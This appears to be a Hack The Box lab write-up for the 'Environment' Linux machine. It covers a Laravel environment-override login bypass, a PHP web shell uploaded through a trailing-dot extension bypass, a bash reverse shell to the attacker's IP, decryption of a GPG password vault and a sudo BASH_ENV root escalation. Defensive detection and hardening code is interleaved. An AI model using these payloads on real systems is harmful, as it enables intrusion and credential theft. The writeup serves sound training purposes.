
Hack The Box / LINUX / 2025-09-06

Hack The Box — Environment (Linux)

Laravel auth bypass to preprod session, file upload extension bypass for RCE, credential recovery from SQLite and GPG vault, and root escalation via sudo BASH_ENV abuse in systeminfo wrapper.

Target

  • IP: 10.10.11.67

Recon

sudo nmap -sC -sV 10.10.11.67 -p- -T5 -v
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
|   256 5c:02:33:95:ef:44:e2:80:cd:3a:96:02:23:f1:92:64 (ECDSA)
|_  256 1f:3d:c2:19:55:28:a1:77:59:51:48:10:c4:4b:74:ab (ED25519)
80/tcp open  http    nginx 1.22.1
|_http-title: Did not follow redirect to http://environment.htb
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add environment.htb to /etc/hosts.

gobuster dir -u 'http://environment.htb/' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 --exclude-length 153 -x php
/index.php            (Status: 200) [Size: 4602]
/login                (Status: 200) [Size: 2391]
/logout               (Status: 302) [Size: 358] [--> http://environment.htb/login]
/upload               (Status: 405) [Size: 244852]
/mailing              (Status: 405) [Size: 244854]
/up                   (Status: 200) [Size: 2125]
/storage              (Status: 301) [Size: 169] [--> http://environment.htb/storage/]
/build                (Status: 301) [Size: 169] [--> http://environment.htb/build/]
/vendor               (Status: 301) [Size: 169] [--> http://environment.htb/vendor/]

Go to http://environment.htb/login.

There is a login form.

Enter random credentials.

Intercept request with Burp.

Modify remember parameter to a random value, for example aaaaa.

The response is an error page that shows the PHP and Laravel versions:

PHP 8.2.28 — Laravel 11.30.0

It also shows a code snippet from the login handler:

    if(App::environment() == "preprod") { //QOL: login directly as me in dev/local/preprod envs
        $request->session()->regenerate();
        $request->session()->put('user_id', 1);
        return redirect('/management/dashboard');
    }

    $user = User::where('email', $email)->first();

This environment-dependent shortcut becomes exploitable because the application honours an --env argument supplied in the query string (CVE-2024-50340). A public exploit exists: https://github.com/Nyamort/CVE-2024-50340

Intercept the login request with Burp.

Set first line to:

POST /login?--env=preprod HTTP/1.1

Send request.

We arrive at http://environment.htb/management/dashboard.
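From the defender's side, the request shape used above is distinctive: a query string whose key looks like a command-line option. The following is an added example for this writeup, not code from the original page or from Laravel or Symfony. It scans nginx combined-format access log lines for such keys, percent-decoding them first so an encoded form is caught too. All log lines, IPs and timestamps below are constructed samples.

```python
"""Detect environment-override attempts (CVE-2024-50340 request shape) in web logs.

Added example for this writeup; it is not part of the original page, nor
of Laravel or Symfony. It scans nginx combined-format access log lines for
query strings whose keys look like command-line options (`--env=preprod`
above), which is the request shape the login bypass relies on. All log
lines below are constructed samples; the IPs and timestamps are made up.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines in nginx "combined" format.
SAMPLE_LOG = """\
10.10.14.150 - - [06/Sep/2025:10:01:02 +0000] "GET /login HTTP/1.1" 200 2391 "-" "Mozilla/5.0"
10.10.14.150 - - [06/Sep/2025:10:01:09 +0000] "POST /login?--env=preprod HTTP/1.1" 302 358 "-" "Mozilla/5.0"
10.10.14.150 - - [06/Sep/2025:10:01:20 +0000] "GET /management/dashboard HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.151 - - [06/Sep/2025:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 4602 "-" "curl/8.0"
10.10.14.152 - - [06/Sep/2025:10:03:00 +0000] "POST /login?%2d%2denv=local HTTP/1.1" 302 358 "-" "python-requests/2.31"
"""

# Client IP, timestamp, method and request target from a combined-format line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)


def argv_style_keys(target: str) -> list[str]:
    """Return query-string keys that begin with '-' (CLI-option lookalikes).

    parse_qsl percent-decodes keys, so an encoded `%2d%2denv` is caught too.
    """
    query = urlsplit(target).query
    return [key for key, _ in parse_qsl(query, keep_blank_values=True)
            if key.startswith("-")]


def scan_access_log(text: str) -> list[dict]:
    """One finding per request whose query string carries option-like keys."""
    findings = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        keys = argv_style_keys(match["target"])
        if keys:
            findings.append({
                "ip": match["ip"],
                "ts": match["ts"],
                "method": match["method"],
                "target": match["target"],
                "keys": keys,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['method']} {f['target']} -> option-like keys {f['keys']}")
```

Run it against a real access log by reading the file into scan_access_log(). Legitimate applications essentially never use query-string keys that start with a dash, so this rule has a low false-positive rate; a hit on /login followed by a 302 into an admin area, as in the second sample line, is the sequence to alert on. The fix on the application side is to upgrade past the vulnerable version so the query string is no longer treated as argv.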

Go to Profile.

We can modify profile image.

If we upload a random file hello.txt, it says: Invalid file detected.

The upload filter is affected by CVE-2024-21546: its extension check can be bypassed by appending a trailing dot to the filename.

Create a PNG image.

See script attachments/create_png.py.

python3 create_png.py

A file test.png is created.

Upload test.png.

Intercept request with Burp.

Change the filename to test.php. (the trailing dot is part of the filename; it is what gets the name past the extension check).

Append this line to the image data:

<?php system($_GET["cmd"]); ?>

Send request.

Go to http://environment.htb/storage/files/test.php?cmd=id.

We see command output of id.
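The bypass above works against an extension check that looks only at the text after the last dot, so "test.php." has an empty extension and passes. The following is an added example for this writeup, not the application's or any library's code: the weak check beside a hardened one that normalises the name first, allows exactly one extension from an allowlist, and rebuilds the stored name from a conservative character set.

```python
"""Upload-name validation: the weak check this writeup bypasses, beside a hardened one.

Added example for this writeup; it is not the application's or any
library's code. naive_is_allowed() reproduces the pattern behind the
trailing-dot bypass: it inspects only the text after the last dot, so
"test.php." has an empty extension and passes. hardened_filename()
normalises the name first, allows exactly one extension from an
allowlist, and rebuilds the stored name from a conservative character set.
"""
from __future__ import annotations

import os
import re

ALLOWED_EXTS = {"png", "jpg", "jpeg", "gif"}
# Extensions a typical PHP-FPM setup executes. The hardened check does not
# rely on this list to be safe (it allowlists instead); it documents the threat.
BLOCKED_EXTS = {"php", "phtml", "phar", "php3", "php4", "php5", "php7", "phps"}
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def naive_is_allowed(filename: str) -> bool:
    """Weak blocklist check on the last extension only (the vulnerable pattern)."""
    ext = filename.rsplit(".", 1)[1].lower() if "." in filename else ""
    return ext not in BLOCKED_EXTS


def hardened_filename(filename: str) -> str | None:
    """Return a safe stored name, or None if the upload must be rejected."""
    # 1. Drop any directory part, then the trailing dots and spaces that
    #    filesystems and libraries commonly strip *after* a check has run.
    name = os.path.basename(filename.replace("\\", "/")).rstrip(". ")
    if not name or name.startswith("."):
        return None  # empty, or a dotfile such as .htaccess
    # 2. Exactly one extension: "shell.php.png" and "shell.png.php" both fail.
    parts = name.lower().split(".")
    if len(parts) != 2:
        return None
    stem, ext = parts
    if ext in BLOCKED_EXTS or ext not in ALLOWED_EXTS:
        return None
    # 3. Rebuild the name so nothing from the client reaches the filesystem verbatim.
    stem = re.sub(r"[^a-z0-9_-]", "_", stem)[:64] or "upload"
    return f"{stem}.{ext}"


def validate_upload(filename: str, data: bytes) -> str | None:
    """Combine the name check with a content check for PNG uploads.

    A magic-byte check is necessary but not sufficient: the payload in this
    writeup is a valid PNG with PHP appended, so the real defence is that the
    stored extension can never be one the web server hands to PHP, and that
    the storage directory is not configured to execute scripts.
    """
    stored = hardened_filename(filename)
    if stored is None:
        return None
    if stored.endswith(".png") and not data.startswith(PNG_MAGIC):
        return None
    return stored


if __name__ == "__main__":
    for candidate in ("test.png", "test.php", "test.php.", "shell.php.png", "../../x y.PNG "):
        print(f"{candidate!r:20} naive={naive_is_allowed(candidate)!s:5} hardened={hardened_filename(candidate)!r}")
```

The important design choice is order: normalise, then validate, then generate the stored name from the validated parts rather than from the client's string. Pair it with a storage location that nginx never passes to PHP-FPM (or a location block that denies execution under /storage), since a valid image with PHP appended defeats content sniffing on its own.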

Start netcat listener:

nc -vlnp 4444

Go to:

http://environment.htb/storage/files/test.php?cmd=bash%20-c%20%27bash%20-i%20%3e%26%20%2fdev%2ftcp%2f10.10.14.150%2f4444%200%3e%261%27

We get a reverse shell as user www-data.

cd /var/www/app/database
sqlite3 database.sqlite
.tables
select * from users;
1|Hish|hish@environment.htb||$2y$12$QPbeVM.u7VbN9KCeAJ.JA.WfWQVWQg0LopB9ILcC7akZ.q641r1gi||2025-01-07 01:51:54|2025-01-12 01:01:48|hish.png
2|Jono|jono@environment.htb||$2y$12$i.h1rug6NfC73tTb8XF0Y.W0GDBjrY5FBfsyX2wOAXfDWOUk9dphm||2025-01-07 01:52:35|2025-01-07 01:52:35|jono.png
3|Bethany|bethany@environment.htb||$2y$12$6kbg21YDMaGrt.iCUkP/s.yLEGAE2S78gWt.6MAODUD3JXFMS13J.||2025-01-07 01:53:18|2025-01-07 01:53:18|bethany.png

Put hish's bcrypt hash in a file named hash.

./hashcat-6.2.6/hashcat.bin -a 0 -m 3200 ./hash ./rockyou.txt

It does not crack.

ls -la /home/hish
drwxr-xr-x 5 hish hish 4096 May 11 05:00 .
drwxr-xr-x 3 root root 4096 Jan 12 11:51 ..
lrwxrwxrwx 1 root root    9 Apr  7 19:29 .bash_history -> /dev/null
-rw-r--r-- 1 hish hish  220 Jan  6 21:28 .bash_logout
-rw-r--r-- 1 hish hish 3526 Jan 12 14:42 .bashrc
drwxr-xr-x 4 hish hish 4096 May 11 07:00 .gnupg
drwxr-xr-x 3 hish hish 4096 Jan  6 21:43 .local
-rw-r--r-- 1 hish hish  807 Jan  6 21:28 .profile
drwxr-xr-x 2 hish hish 4096 Jan 12 11:49 backup
-rw-r--r-- 1 root hish   33 May 10 22:16 user.txt
ls -la /home/hish/backup
drwxr-xr-x 2 hish hish 4096 Jan 12 11:49 .
drwxr-xr-x 5 hish hish 4096 May 11 05:00 ..
-rw-r--r-- 1 hish hish  430 May 11 07:00 keyvault.gpg
ls -la /home/hish/.gnupg
drwxr-xr-x 4 hish hish 4096 May 11 07:00 .
drwxr-xr-x 5 hish hish 4096 May 11 05:00 ..
drwxr-xr-x 2 hish hish 4096 May 11 07:00 openpgp-revocs.d
drwxr-x--- 2 hish hish 4096 May 11 07:00 private-keys-v1.d
-rwxr-xr-x 1 hish hish 1446 Jan 12 03:13 pubring.kbx
-rwxr-xr-x 1 hish hish   32 Jan 12 03:11 pubring.kbx~
-rwxr-xr-x 1 hish hish  600 Jan 12 11:48 random_seed
-rwxr-xr-x 1 hish hish 1280 Jan 12 11:48 trustdb.gpg

We do not have access to private keys.

But we can do this:

cp -r /home/hish/.gnupg /tmp/test
chmod -R 700 /tmp/test
gpg --homedir /tmp/test --list-secret-keys
gpg --homedir /tmp/test --output /dev/shm/message.txt --decrypt /home/hish/backup/keyvault.gpg

cat /dev/shm/message.txt
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!
ssh hish@environment.htb

Enter password marineSPm@ster!!.

We get a shell as user hish.

sudo -l
Matching Defaults entries for hish on environment:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    env_keep+="ENV BASH_ENV", use_pty

User hish may run the following commands on environment:
    (ALL) /usr/bin/systeminfo
file /usr/bin/systeminfo
/usr/bin/systeminfo: Bourne-Again shell script, ASCII text executable

Let us check what BASH_ENV and ENV mean (from the Bash manual):

BASH_ENV: If this variable is set when Bash is invoked to execute a shell script, its value is expanded and used as the name of a startup file to read before executing the script.

ENV: When invoked as an interactive shell with the name sh, Bash looks for the variable ENV, expands its value if it is defined, and uses the expanded value as the name of a file to read and execute.

Create file /dev/shm/myscript.sh with content:

#!/bin/bash
bash

Make it executable:

chmod +x /dev/shm/myscript.sh

Now run:

export BASH_ENV=/dev/shm/myscript.sh
sudo systeminfo

We get a shell as user root.
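The root cause is a sudoers policy that keeps ENV and BASH_ENV through env_reset while granting a Bash script. The following is an added example for this writeup, not part of sudo or of the target machine: a small audit that parses env_keep assignments (from a sudoers file or from `sudo -l` output), flags kept variables that change how a privileged script is interpreted, and prints the Defaults line that removes them. The sample sudoers text is constructed to match the `sudo -l` output above.

```python
"""Audit sudoers Defaults for env_keep entries that let the caller control
how a privileged script is interpreted.

Added example for this writeup; it is not part of sudo or of the target
machine. The samples below are constructed to match the `sudo -l` output
above. The parser accepts both sudoers syntax and `sudo -l` output,
handles backslash line continuations and the `env_keep = / += / -=`
forms, and ignores the rest of the sudoers grammar.
"""
from __future__ import annotations

import re

# Variables that change what code a shell or interpreter runs before the
# intended script, or where it loads libraries from.
DANGEROUS = {
    "BASH_ENV", "ENV",                 # bash reads these files before a script
    "LD_PRELOAD", "LD_LIBRARY_PATH",   # dynamic loader; sudo scrubs them unless kept
    "PYTHONPATH", "PERL5LIB", "PERL5OPT",
}

# Constructed sudoers fragment equivalent to the policy found on the box.
SAMPLE_VULNERABLE = """\
Defaults    env_reset, mail_badpass, \\
            secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults    env_keep += "ENV BASH_ENV"
Defaults    use_pty
hish ALL=(ALL) /usr/bin/systeminfo
"""

# The same policy with a minimal corrective line appended.
SAMPLE_FIXED = SAMPLE_VULNERABLE + 'Defaults    env_keep -= "ENV BASH_ENV"\n'

# Constructed `sudo -l` output in the same shape as the writeup's.
SAMPLE_SUDO_L = """\
Matching Defaults entries for hish on environment:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin,
    env_keep+="ENV BASH_ENV", use_pty

User hish may run the following commands on environment:
    (ALL) /usr/bin/systeminfo
"""

ENV_KEEP_RE = re.compile(r'env_keep\s*(\+=|-=|=)\s*"?([^",]*)"?')


def parse_env_keep(text: str) -> set[str]:
    """Apply env_keep assignments in order and return the final kept set."""
    kept: set[str] = set()
    text = re.sub(r"\\\n\s*", " ", text)  # join backslash-newline continuations
    for line in text.splitlines():
        line = line.split("#", 1)[0]  # drop trailing comments
        for op, names in ENV_KEEP_RE.findall(line):
            names = set(names.split())
            if op == "=":
                kept = names
            elif op == "+=":
                kept |= names
            else:
                kept -= names
    return kept


def audit(text: str) -> list[str]:
    """Kept variables that can alter interpretation of a privileged command."""
    return sorted(parse_env_keep(text) & DANGEROUS)


def suggested_fix(text: str) -> str:
    """A Defaults line that removes the flagged variables (sudoers `-=` form)."""
    flagged = audit(text)
    return 'Defaults env_keep -= "%s"' % " ".join(flagged) if flagged else ""


if __name__ == "__main__":
    for label, sample in (("sudoers", SAMPLE_VULNERABLE),
                          ("sudo -l", SAMPLE_SUDO_L),
                          ("fixed", SAMPLE_FIXED)):
        print(f"{label}: flagged={audit(sample)} fix={suggested_fix(sample)!r}")
```

The `-=` line is the smallest patch that can be appended without touching the existing Defaults; the cleaner fix is to delete the `env_keep += "ENV BASH_ENV"` entry altogether, since nothing a wrapper script legitimately needs comes from those two variables. Note that the finding is only as severe as the command it is paired with: it is the combination of keeping BASH_ENV and granting a Bash script (as `file /usr/bin/systeminfo` confirmed above) that yields a root shell.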